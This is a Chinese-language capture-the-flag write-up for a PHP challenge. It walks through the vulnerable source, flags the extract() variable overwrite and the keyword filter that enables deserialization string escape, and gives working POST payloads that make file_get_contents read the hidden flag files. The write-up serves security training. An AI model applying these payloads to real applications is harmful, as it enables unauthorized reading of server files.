点击source_code,出现源码

    1. <?php
    3. $function = @$_GET['f'];
    5. function filter($img){
    6.     $filter_arr = array('php','flag','php5','php4','fl1g');
    7.     $filter = '/'.implode('|',$filter_arr).'/i';
    8.     return preg_replace($filter,'',$img);
    9. }
    12. if($_SESSION){
    13.     unset($_SESSION);
    14. }
    16. $_SESSION["user"] = 'guest';
    17. $_SESSION['function'] = $function;
    19. extract($_POST);
    21. if(!$function){
    22.     echo '<a href="index.php?f=highlight_file">source_code</a>';
    23. }
    25. if(!$_GET['img_path']){
    26.     $_SESSION['img'] = base64_encode('guest_img.png');
    27. }else{
    28.     $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
    29. }
    31. $serialize_info = filter(serialize($_SESSION));
    33. if($function == 'highlight_file'){
    34.     highlight_file('index.php');
    35. }else if($function == 'phpinfo'){
    36.     eval('phpinfo();'); //maybe you can find something in here!
    37. }else if($function == 'show_image'){
    38.     $userinfo = unserialize($serialize_info);
    39.     echo file_get_contents(base64_decode($userinfo['img']));
    40. }

    先审计下代码,

    1. filter函数,将'php','flag','php5','php4','fl1g'几个关键字全部替换成空。
    2. extract($_POST);,变量覆盖漏洞。
    3. $serialize_info = filter(serialize($_SESSION));,filter会删除掉某些关键字,可能会导致反序列化字符串逃逸。
    4. file_get_contents(base64_decode($userinfo['img']));,根据反序列化后的对象读取文件内容。

    最后的目标就是让file_get_contents读取flag文件没错了,但是还不知道flag文件在哪。
    第36行源码出写了再phpinfo()中或许能找到什么,打开来看看:

    1. auto_append_file    d0g3_f1ag.php    d0g3_f1ag.php

    那么这个应该就是要读取的文件了。
    接下来就是想办法构造字符串让file_get_contents读取这个文件,根据参数往上一步一步找,可以看到最后参数其实是$_SESSION['img'],可以控制的地方有两个,一个是extract($_POST);,但是这个出现在$_SESSION['img']赋值之前,所以不行,第二个是:

    1. if(!$_GET['img_path']){
    2.     $_SESSION['img'] = base64_encode('guest_img.png');
    3. }else{
    4.     $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
    5. }

    如果url中没有参数img_path,$_SESSION[‘img’]就是base64编码后的guest_img.png,如果有的话,虽然img的值和我们的输入有关,但是会再经过一次sha1加密,所以更不可能控制$_SESSION['img']的值了。

    但是再往下会看到有一个$serialize_info = filter(serialize($_SESSION));,前面也提到了,filter会将关键字删除,导致了反序列化字符串逃逸,那么反序列化字符串基本上就可以控制了。

    构造payload:

    1. http://111.200.241.244:57126/index.php?f=show_image
    3. POST DATA:
    4. _SESSION[flagflag]=";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

    序列化后的字符串:

    1. a:4:{s:4:"user";s:5:"guest";s:8:"function";s:10:"show_image";s:8:"flagflag";s:47:"";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

    提交后得到

    1. <?php
    3. $flag = 'flag in /d0g3_fllllllag';
    5. ?>

    再次构造payload:

    1. _SESSION[flagflag]=";s:1:"1";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

    提交得到flag。